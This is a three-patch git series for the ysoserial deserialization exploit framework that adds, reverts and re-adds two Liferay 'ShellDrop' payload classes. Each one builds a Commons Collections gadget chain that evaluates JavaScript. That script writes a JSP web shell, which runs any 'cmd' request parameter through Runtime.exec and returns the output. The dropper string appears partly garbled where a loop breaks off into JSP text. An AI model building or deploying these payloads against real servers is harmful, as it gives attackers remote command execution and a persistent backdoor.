From 979ba615a91014d79239e4cb233467839862a721 Mon Sep 17 00:00:00 2001 From: Jang Date: Tue, 11 Jun 2019 08:56:55 +0700 Subject: [PATCH 1/3] Change beanutil 1.9.2->1.8.2 Change CommonsCollections 3.1->3.2.1 Add Liferay shell drop --- pom.xml | 4 +- .../ysoserial/payloads/CommonsBeanutils1.java | 3 +- .../payloads/LiferayCC5_ShellDrop.java | 66 ++++++++++++++++ .../payloads/LiferayCC6_ShellDrop.java | 79 +++++++++++++++++++ .../payloads/annotation/Authors.java | 2 +- 5 files changed, 150 insertions(+), 4 deletions(-) create mode 100644 src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java create mode 100644 src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java diff --git a/pom.xml b/pom.xml index 73d39c47..5e9efb46 100644 --- a/pom.xml +++ b/pom.xml @@ -178,7 +178,7 @@ commons-collections commons-collections - 3.1 + 3.2.1 org.beanshell @@ -188,7 +188,7 @@ commons-beanutils commons-beanutils - 1.9.2 + 1.8.2 org.apache.commons diff --git a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java index 2495be77..db176a99 100755 --- a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java +++ b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java @@ -12,7 +12,8 @@ import ysoserial.payloads.util.Reflections; @SuppressWarnings({ "rawtypes", "unchecked" }) -@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"}) +@Dependencies({"commons-beanutils:commons-beanutils:1.8.2", "commons-collections:commons-collections:3.2.1", "commons" + + "-logging:commons-logging:1.2"}) @Authors({ Authors.FROHOFF }) public class CommonsBeanutils1 implements ObjectPayload { diff --git a/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java b/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java new file mode 100644 index 00000000..e2d1a6f2 --- /dev/null +++ b/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java @@ -0,0 +1,66 @@ +package ysoserial.payloads; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; +import ysoserial.payloads.annotation.Authors; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.annotation.PayloadTest; +import ysoserial.payloads.util.JavaVersion; +import ysoserial.payloads.util.PayloadRunner; +import ysoserial.payloads.util.Reflections; + +import java.io.FileOutputStream; +import java.io.ObjectOutputStream; + +import javax.management.BadAttributeValueExpException; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Map; + +@PayloadTest( + precondition = "isApplicableJavaVersion" +) +@Dependencies({"commons-collections:commons-collections:3.2.1"}) +@Authors({Authors.MATTHIASKAISER, Authors.JASINNER, Authors.JANG}) +public class LiferayCC5_ShellDrop extends PayloadRunner implements ObjectPayload { + public LiferayCC5_ShellDrop() { + } + + public BadAttributeValueExpException getObject(String command) throws Exception { + String dropper = "var os = java.lang.System.getProperty(\"os.name\"); var path = java.lang.System.getProperty(\"java.class.path\"); print(path); var path = path.replaceAll(\"\\\\\\\\\", \"/\"); var delim = \":\"; if(path.indexOf(\";\")) {delim = \";\"}; var x1 = path.split(delim); var pathok=\"\";for(var i=0; i <%! public String esc(String str){ StringBuffer sb = new StringBuffer(); for(char c : str.toCharArray()) if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) sb.append( c ); else sb.append(\\\"&#\\\"+(int)(c&0xff)+\\\";\\\"); return sb.toString(); } %><% String cmd = request.getParameter(\\\"cmd\\\"); String path = java.lang.System.getProperty(\\\"java.class.path\\\"); out.println(path); if ( cmd != null) { out.println(\\\"
Command was: \\\"+esc(cmd)+\\\"\\\\n\\\"); 	java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 	String line = in.readLine(); 	while( line != null ){ 		out.println(esc(line)); 		line = in.readLine(); 	} 	out.println(\\\"
\\\"); } %>\"); writer.close(); "; + + String[] execArgs = new String[]{dropper}; + Transformer transformerChain = new ChainedTransformer(new Transformer[]{new ConstantTransformer(1)}); + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(javax.script.ScriptEngineManager.class), + new InvokerTransformer("newInstance", new Class[]{}, + new Object[]{} + ), + new InvokerTransformer("getEngineByName", new Class[]{String.class}, + new Object[]{"JavaScript"} + ), + new InvokerTransformer("eval", new Class[]{String.class}, execArgs), + new ConstantTransformer(1)}; + Map innerMap = new HashMap(); + Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); + BadAttributeValueExpException val = new BadAttributeValueExpException((Object)null); + Field valfield = val.getClass().getDeclaredField("val"); + valfield.setAccessible(true); + valfield.set(val, entry); + Reflections.setFieldValue(transformerChain, "iTransformers", transformers); + return val; + } + + public static void main(String[] args) throws Exception { + PayloadRunner.run(LiferayCC5_ShellDrop.class, args); + } + + public static boolean isApplicableJavaVersion() { + return JavaVersion.isBadAttrValExcReadObj(); + } +} diff --git a/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java b/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java new file mode 100644 index 00000000..b6c7823c --- /dev/null +++ b/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java @@ -0,0 +1,79 @@ +package ysoserial.payloads; + +import java.io.FileOutputStream; +import java.io.ObjectOutputStream; +import java.io.Serializable; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.HashSet; +import java.util.Map; +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; +import ysoserial.payloads.annotation.Authors; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.util.PayloadRunner; + +@Dependencies({"commons-collections:commons-collections:3.2.1"}) +@Authors({ Authors.MATTHIASKAISER, Authors.JANG }) +public class LiferayCC6_ShellDrop extends PayloadRunner implements ObjectPayload { + public Serializable getObject(String command) throws Exception { + String dropper = "var os = java.lang.System.getProperty(\"os.name\"); var path = java.lang.System.getProperty(\"java.class.path\"); print(path); var path = path.replaceAll(\"\\\\\\\\\", \"/\"); var delim = \":\"; if(path.indexOf(\";\")) {delim = \";\"}; var x1 = path.split(delim); var pathok=\"\";for(var i=0; i <%! public String esc(String str){ StringBuffer sb = new StringBuffer(); for(char c : str.toCharArray()) if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) sb.append( c ); else sb.append(\\\"&#\\\"+(int)(c&0xff)+\\\";\\\"); return sb.toString(); } %><% String cmd = request.getParameter(\\\"cmd\\\"); String path = java.lang.System.getProperty(\\\"java.class.path\\\"); out.println(path); if ( cmd != null) { out.println(\\\"
Command was: \\\"+esc(cmd)+\\\"\\\\n\\\"); 	java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 	String line = in.readLine(); 	while( line != null ){ 		out.println(esc(line)); 		line = in.readLine(); 	} 	out.println(\\\"
\\\"); } %>\"); writer.close(); "; + String[] execArgs = new String[]{dropper}; + Transformer[] transformers = new Transformer[]{new ConstantTransformer(javax.script.ScriptEngineManager.class), + new InvokerTransformer("newInstance", new Class[]{}, + new Object[]{}), + new InvokerTransformer("getEngineByName", new Class[]{String.class}, + new Object[]{"JavaScript"}), + new InvokerTransformer("eval", new Class[]{String.class}, execArgs), new ConstantTransformer(1)}; + Transformer transformerChain = new ChainedTransformer(transformers); + Map innerMap = new HashMap(); + Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); + HashSet map = new HashSet(1); + map.add("foo"); + Field f = null; + + try { + f = HashSet.class.getDeclaredField("map"); + } catch (NoSuchFieldException var18) { + f = HashSet.class.getDeclaredField("backingMap"); + } + + f.setAccessible(true); + HashMap innimpl = (HashMap) f.get(map); + Field f2 = null; + + try { + f2 = HashMap.class.getDeclaredField("table"); + } catch (NoSuchFieldException var17) { + f2 = HashMap.class.getDeclaredField("elementData"); + } + + f2.setAccessible(true); + Object[] array = (Object[]) ((Object[]) f2.get(innimpl)); + Object node = array[0]; + if (node == null) { + node = array[1]; + } + + Field keyField = null; + + try { + keyField = node.getClass().getDeclaredField("key"); + } catch (Exception var16) { + keyField = Class.forName("java.util.MapEntry").getDeclaredField("key"); + } + + keyField.setAccessible(true); + keyField.set(node, entry); + return map; + } + + public static void main(String[] args) throws Exception { + PayloadRunner.run(LiferayCC6_ShellDrop.class, args); + } +} diff --git a/src/main/java/ysoserial/payloads/annotation/Authors.java b/src/main/java/ysoserial/payloads/annotation/Authors.java index 57232da3..21e0255d 100644 --- a/src/main/java/ysoserial/payloads/annotation/Authors.java +++ b/src/main/java/ysoserial/payloads/annotation/Authors.java @@ -23,7 +23,7 @@ String SCRISTALLI = "scristalli"; String HANYRAX = "hanyrax"; String EDOARDOVIGNATI = "EdoardoVignati"; - + String JANG = "Jang"; String[] value() default {}; public static class Utils { From f8834ea54ad2b48c8fd05da6db6c336731ac8206 Mon Sep 17 00:00:00 2001 From: Jang Date: Tue, 11 Jun 2019 09:01:39 +0700 Subject: [PATCH 2/3] Revert "Change beanutil 1.9.2->1.8.2" This reverts commit 979ba615a91014d79239e4cb233467839862a721. --- pom.xml | 4 +- .../ysoserial/payloads/CommonsBeanutils1.java | 3 +- .../payloads/LiferayCC5_ShellDrop.java | 66 ---------------- .../payloads/LiferayCC6_ShellDrop.java | 79 ------------------- .../payloads/annotation/Authors.java | 2 +- 5 files changed, 4 insertions(+), 150 deletions(-) delete mode 100644 src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java delete mode 100644 src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java diff --git a/pom.xml b/pom.xml index 5e9efb46..73d39c47 100644 --- a/pom.xml +++ b/pom.xml @@ -178,7 +178,7 @@ commons-collections commons-collections - 3.2.1 + 3.1 org.beanshell @@ -188,7 +188,7 @@ commons-beanutils commons-beanutils - 1.8.2 + 1.9.2 org.apache.commons diff --git a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java index db176a99..2495be77 100755 --- a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java +++ b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java @@ -12,8 +12,7 @@ import ysoserial.payloads.util.Reflections; @SuppressWarnings({ "rawtypes", "unchecked" }) -@Dependencies({"commons-beanutils:commons-beanutils:1.8.2", "commons-collections:commons-collections:3.2.1", "commons" + - "-logging:commons-logging:1.2"}) +@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"}) @Authors({ Authors.FROHOFF }) public class CommonsBeanutils1 implements ObjectPayload { diff --git a/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java b/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java deleted file mode 100644 index e2d1a6f2..00000000 --- a/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java +++ /dev/null @@ -1,66 +0,0 @@ -package ysoserial.payloads; - -import org.apache.commons.collections.Transformer; -import org.apache.commons.collections.functors.ChainedTransformer; -import org.apache.commons.collections.functors.ConstantTransformer; -import org.apache.commons.collections.functors.InvokerTransformer; -import org.apache.commons.collections.keyvalue.TiedMapEntry; -import org.apache.commons.collections.map.LazyMap; -import ysoserial.payloads.annotation.Authors; -import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.annotation.PayloadTest; -import ysoserial.payloads.util.JavaVersion; -import ysoserial.payloads.util.PayloadRunner; -import ysoserial.payloads.util.Reflections; - -import java.io.FileOutputStream; -import java.io.ObjectOutputStream; - -import javax.management.BadAttributeValueExpException; -import java.lang.reflect.Field; -import java.util.HashMap; -import java.util.Map; - -@PayloadTest( - precondition = "isApplicableJavaVersion" -) -@Dependencies({"commons-collections:commons-collections:3.2.1"}) -@Authors({Authors.MATTHIASKAISER, Authors.JASINNER, Authors.JANG}) -public class LiferayCC5_ShellDrop extends PayloadRunner implements ObjectPayload { - public LiferayCC5_ShellDrop() { - } - - public BadAttributeValueExpException getObject(String command) throws Exception { - String dropper = "var os = java.lang.System.getProperty(\"os.name\"); var path = java.lang.System.getProperty(\"java.class.path\"); print(path); var path = path.replaceAll(\"\\\\\\\\\", \"/\"); var delim = \":\"; if(path.indexOf(\";\")) {delim = \";\"}; var x1 = path.split(delim); var pathok=\"\";for(var i=0; i <%! public String esc(String str){ StringBuffer sb = new StringBuffer(); for(char c : str.toCharArray()) if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) sb.append( c ); else sb.append(\\\"&#\\\"+(int)(c&0xff)+\\\";\\\"); return sb.toString(); } %><% String cmd = request.getParameter(\\\"cmd\\\"); String path = java.lang.System.getProperty(\\\"java.class.path\\\"); out.println(path); if ( cmd != null) { out.println(\\\"
Command was: \\\"+esc(cmd)+\\\"\\\\n\\\"); 	java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 	String line = in.readLine(); 	while( line != null ){ 		out.println(esc(line)); 		line = in.readLine(); 	} 	out.println(\\\"
\\\"); } %>\"); writer.close(); "; - - String[] execArgs = new String[]{dropper}; - Transformer transformerChain = new ChainedTransformer(new Transformer[]{new ConstantTransformer(1)}); - Transformer[] transformers = new Transformer[]{ - new ConstantTransformer(javax.script.ScriptEngineManager.class), - new InvokerTransformer("newInstance", new Class[]{}, - new Object[]{} - ), - new InvokerTransformer("getEngineByName", new Class[]{String.class}, - new Object[]{"JavaScript"} - ), - new InvokerTransformer("eval", new Class[]{String.class}, execArgs), - new ConstantTransformer(1)}; - Map innerMap = new HashMap(); - Map lazyMap = LazyMap.decorate(innerMap, transformerChain); - TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); - BadAttributeValueExpException val = new BadAttributeValueExpException((Object)null); - Field valfield = val.getClass().getDeclaredField("val"); - valfield.setAccessible(true); - valfield.set(val, entry); - Reflections.setFieldValue(transformerChain, "iTransformers", transformers); - return val; - } - - public static void main(String[] args) throws Exception { - PayloadRunner.run(LiferayCC5_ShellDrop.class, args); - } - - public static boolean isApplicableJavaVersion() { - return JavaVersion.isBadAttrValExcReadObj(); - } -} diff --git a/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java b/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java deleted file mode 100644 index b6c7823c..00000000 --- a/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java +++ /dev/null @@ -1,79 +0,0 @@ -package ysoserial.payloads; - -import java.io.FileOutputStream; -import java.io.ObjectOutputStream; -import java.io.Serializable; -import java.lang.reflect.Field; -import java.util.HashMap; -import java.util.HashSet; -import java.util.Map; -import org.apache.commons.collections.Transformer; -import org.apache.commons.collections.functors.ChainedTransformer; -import org.apache.commons.collections.functors.ConstantTransformer; -import org.apache.commons.collections.functors.InvokerTransformer; -import org.apache.commons.collections.keyvalue.TiedMapEntry; -import org.apache.commons.collections.map.LazyMap; -import ysoserial.payloads.annotation.Authors; -import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.util.PayloadRunner; - -@Dependencies({"commons-collections:commons-collections:3.2.1"}) -@Authors({ Authors.MATTHIASKAISER, Authors.JANG }) -public class LiferayCC6_ShellDrop extends PayloadRunner implements ObjectPayload { - public Serializable getObject(String command) throws Exception { - String dropper = "var os = java.lang.System.getProperty(\"os.name\"); var path = java.lang.System.getProperty(\"java.class.path\"); print(path); var path = path.replaceAll(\"\\\\\\\\\", \"/\"); var delim = \":\"; if(path.indexOf(\";\")) {delim = \";\"}; var x1 = path.split(delim); var pathok=\"\";for(var i=0; i <%! public String esc(String str){ StringBuffer sb = new StringBuffer(); for(char c : str.toCharArray()) if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) sb.append( c ); else sb.append(\\\"&#\\\"+(int)(c&0xff)+\\\";\\\"); return sb.toString(); } %><% String cmd = request.getParameter(\\\"cmd\\\"); String path = java.lang.System.getProperty(\\\"java.class.path\\\"); out.println(path); if ( cmd != null) { out.println(\\\"
Command was: \\\"+esc(cmd)+\\\"\\\\n\\\"); 	java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 	String line = in.readLine(); 	while( line != null ){ 		out.println(esc(line)); 		line = in.readLine(); 	} 	out.println(\\\"
\\\"); } %>\"); writer.close(); "; - String[] execArgs = new String[]{dropper}; - Transformer[] transformers = new Transformer[]{new ConstantTransformer(javax.script.ScriptEngineManager.class), - new InvokerTransformer("newInstance", new Class[]{}, - new Object[]{}), - new InvokerTransformer("getEngineByName", new Class[]{String.class}, - new Object[]{"JavaScript"}), - new InvokerTransformer("eval", new Class[]{String.class}, execArgs), new ConstantTransformer(1)}; - Transformer transformerChain = new ChainedTransformer(transformers); - Map innerMap = new HashMap(); - Map lazyMap = LazyMap.decorate(innerMap, transformerChain); - TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); - HashSet map = new HashSet(1); - map.add("foo"); - Field f = null; - - try { - f = HashSet.class.getDeclaredField("map"); - } catch (NoSuchFieldException var18) { - f = HashSet.class.getDeclaredField("backingMap"); - } - - f.setAccessible(true); - HashMap innimpl = (HashMap) f.get(map); - Field f2 = null; - - try { - f2 = HashMap.class.getDeclaredField("table"); - } catch (NoSuchFieldException var17) { - f2 = HashMap.class.getDeclaredField("elementData"); - } - - f2.setAccessible(true); - Object[] array = (Object[]) ((Object[]) f2.get(innimpl)); - Object node = array[0]; - if (node == null) { - node = array[1]; - } - - Field keyField = null; - - try { - keyField = node.getClass().getDeclaredField("key"); - } catch (Exception var16) { - keyField = Class.forName("java.util.MapEntry").getDeclaredField("key"); - } - - keyField.setAccessible(true); - keyField.set(node, entry); - return map; - } - - public static void main(String[] args) throws Exception { - PayloadRunner.run(LiferayCC6_ShellDrop.class, args); - } -} diff --git a/src/main/java/ysoserial/payloads/annotation/Authors.java b/src/main/java/ysoserial/payloads/annotation/Authors.java index 21e0255d..57232da3 100644 --- a/src/main/java/ysoserial/payloads/annotation/Authors.java +++ b/src/main/java/ysoserial/payloads/annotation/Authors.java @@ -23,7 +23,7 @@ String SCRISTALLI = "scristalli"; String HANYRAX = "hanyrax"; String EDOARDOVIGNATI = "EdoardoVignati"; - String JANG = "Jang"; + String[] value() default {}; public static class Utils { From 66264757c94d8911f2b8ecc36a9e1167044420c8 Mon Sep 17 00:00:00 2001 From: Jang Date: Tue, 11 Jun 2019 09:07:21 +0700 Subject: [PATCH 3/3] Change beanutil 1.9.2->1.8.2 Change CommonsCollections 3.1->3.2.1 Add Liferay shell drop --- pom.xml | 4 +- .../ysoserial/payloads/CommonsBeanutils1.java | 3 +- .../payloads/LiferayCC5_ShellDrop.java | 67 ++++++++++++++++ .../payloads/LiferayCC6_ShellDrop.java | 79 +++++++++++++++++++ .../payloads/annotation/Authors.java | 1 + 5 files changed, 151 insertions(+), 3 deletions(-) create mode 100644 src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java create mode 100644 src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java diff --git a/pom.xml b/pom.xml index 73d39c47..5e9efb46 100644 --- a/pom.xml +++ b/pom.xml @@ -178,7 +178,7 @@ commons-collections commons-collections - 3.1 + 3.2.1 org.beanshell @@ -188,7 +188,7 @@ commons-beanutils commons-beanutils - 1.9.2 + 1.8.2 org.apache.commons diff --git a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java index 2495be77..db176a99 100755 --- a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java +++ b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java @@ -12,7 +12,8 @@ import ysoserial.payloads.util.Reflections; @SuppressWarnings({ "rawtypes", "unchecked" }) -@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"}) +@Dependencies({"commons-beanutils:commons-beanutils:1.8.2", "commons-collections:commons-collections:3.2.1", "commons" + + "-logging:commons-logging:1.2"}) @Authors({ Authors.FROHOFF }) public class CommonsBeanutils1 implements ObjectPayload { diff --git a/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java b/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java new file mode 100644 index 00000000..069af0ea --- /dev/null +++ b/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java @@ -0,0 +1,67 @@ + +package ysoserial.payloads; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; +import ysoserial.payloads.annotation.Authors; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.annotation.PayloadTest; +import ysoserial.payloads.util.JavaVersion; +import ysoserial.payloads.util.PayloadRunner; +import ysoserial.payloads.util.Reflections; + +import java.io.FileOutputStream; +import java.io.ObjectOutputStream; + +import javax.management.BadAttributeValueExpException; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Map; + +@SuppressWarnings({"rawtypes", "unchecked"}) +@PayloadTest ( precondition = "isApplicableJavaVersion") +@Dependencies({"commons-collections:commons-collections:3.1"}) + +@Authors({ Authors.MATTHIASKAISER, Authors.JASINNER, Authors.JANG }) +public class LiferayCC5_ShellDrop extends PayloadRunner implements ObjectPayload { + public LiferayCC5_ShellDrop() { + } + + public BadAttributeValueExpException getObject(String command) throws Exception { + String dropper = "var os = java.lang.System.getProperty(\"os.name\"); var path = java.lang.System.getProperty(\"java.class.path\"); print(path); var path = path.replaceAll(\"\\\\\\\\\", \"/\"); var delim = \":\"; if(path.indexOf(\";\")) {delim = \";\"}; var x1 = path.split(delim); var pathok=\"\";for(var i=0; i <%! public String esc(String str){ StringBuffer sb = new StringBuffer(); for(char c : str.toCharArray()) if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) sb.append( c ); else sb.append(\\\"&#\\\"+(int)(c&0xff)+\\\";\\\"); return sb.toString(); } %><% String cmd = request.getParameter(\\\"cmd\\\"); String path = java.lang.System.getProperty(\\\"java.class.path\\\"); out.println(path); if ( cmd != null) { out.println(\\\"
Command was: \\\"+esc(cmd)+\\\"\\\\n\\\"); 	java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 	String line = in.readLine(); 	while( line != null ){ 		out.println(esc(line)); 		line = in.readLine(); 	} 	out.println(\\\"
\\\"); } %>\"); writer.close(); "; + + String[] execArgs = new String[]{dropper}; + Transformer transformerChain = new ChainedTransformer(new Transformer[]{new ConstantTransformer(1)}); + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(javax.script.ScriptEngineManager.class), + new InvokerTransformer("newInstance", new Class[]{}, + new Object[]{} + ), + new InvokerTransformer("getEngineByName", new Class[]{String.class}, + new Object[]{"JavaScript"} + ), + new InvokerTransformer("eval", new Class[]{String.class}, execArgs), + new ConstantTransformer(1)}; + Map innerMap = new HashMap(); + Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); + BadAttributeValueExpException val = new BadAttributeValueExpException((Object)null); + Field valfield = val.getClass().getDeclaredField("val"); + valfield.setAccessible(true); + valfield.set(val, entry); + Reflections.setFieldValue(transformerChain, "iTransformers", transformers); + return val; + } + + public static void main(String[] args) throws Exception { + PayloadRunner.run(LiferayCC5_ShellDrop.class, args); + } + + public static boolean isApplicableJavaVersion() { + return JavaVersion.isBadAttrValExcReadObj(); + } +} diff --git a/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java b/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java new file mode 100644 index 00000000..b6c7823c --- /dev/null +++ b/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java @@ -0,0 +1,79 @@ +package ysoserial.payloads; + +import java.io.FileOutputStream; +import java.io.ObjectOutputStream; +import java.io.Serializable; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.HashSet; +import java.util.Map; +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; +import ysoserial.payloads.annotation.Authors; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.util.PayloadRunner; + +@Dependencies({"commons-collections:commons-collections:3.2.1"}) +@Authors({ Authors.MATTHIASKAISER, Authors.JANG }) +public class LiferayCC6_ShellDrop extends PayloadRunner implements ObjectPayload { + public Serializable getObject(String command) throws Exception { + String dropper = "var os = java.lang.System.getProperty(\"os.name\"); var path = java.lang.System.getProperty(\"java.class.path\"); print(path); var path = path.replaceAll(\"\\\\\\\\\", \"/\"); var delim = \":\"; if(path.indexOf(\";\")) {delim = \";\"}; var x1 = path.split(delim); var pathok=\"\";for(var i=0; i <%! public String esc(String str){ StringBuffer sb = new StringBuffer(); for(char c : str.toCharArray()) if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) sb.append( c ); else sb.append(\\\"&#\\\"+(int)(c&0xff)+\\\";\\\"); return sb.toString(); } %><% String cmd = request.getParameter(\\\"cmd\\\"); String path = java.lang.System.getProperty(\\\"java.class.path\\\"); out.println(path); if ( cmd != null) { out.println(\\\"
Command was: \\\"+esc(cmd)+\\\"\\\\n\\\"); 	java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 	String line = in.readLine(); 	while( line != null ){ 		out.println(esc(line)); 		line = in.readLine(); 	} 	out.println(\\\"
\\\"); } %>\"); writer.close(); "; + String[] execArgs = new String[]{dropper}; + Transformer[] transformers = new Transformer[]{new ConstantTransformer(javax.script.ScriptEngineManager.class), + new InvokerTransformer("newInstance", new Class[]{}, + new Object[]{}), + new InvokerTransformer("getEngineByName", new Class[]{String.class}, + new Object[]{"JavaScript"}), + new InvokerTransformer("eval", new Class[]{String.class}, execArgs), new ConstantTransformer(1)}; + Transformer transformerChain = new ChainedTransformer(transformers); + Map innerMap = new HashMap(); + Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); + HashSet map = new HashSet(1); + map.add("foo"); + Field f = null; + + try { + f = HashSet.class.getDeclaredField("map"); + } catch (NoSuchFieldException var18) { + f = HashSet.class.getDeclaredField("backingMap"); + } + + f.setAccessible(true); + HashMap innimpl = (HashMap) f.get(map); + Field f2 = null; + + try { + f2 = HashMap.class.getDeclaredField("table"); + } catch (NoSuchFieldException var17) { + f2 = HashMap.class.getDeclaredField("elementData"); + } + + f2.setAccessible(true); + Object[] array = (Object[]) ((Object[]) f2.get(innimpl)); + Object node = array[0]; + if (node == null) { + node = array[1]; + } + + Field keyField = null; + + try { + keyField = node.getClass().getDeclaredField("key"); + } catch (Exception var16) { + keyField = Class.forName("java.util.MapEntry").getDeclaredField("key"); + } + + keyField.setAccessible(true); + keyField.set(node, entry); + return map; + } + + public static void main(String[] args) throws Exception { + PayloadRunner.run(LiferayCC6_ShellDrop.class, args); + } +} diff --git a/src/main/java/ysoserial/payloads/annotation/Authors.java b/src/main/java/ysoserial/payloads/annotation/Authors.java index 57232da3..b6d7aee5 100644 --- a/src/main/java/ysoserial/payloads/annotation/Authors.java +++ b/src/main/java/ysoserial/payloads/annotation/Authors.java @@ -23,6 +23,7 @@ String SCRISTALLI = "scristalli"; String HANYRAX = "hanyrax"; String EDOARDOVIGNATI = "EdoardoVignati"; + String JANG = "Jang"; String[] value() default {};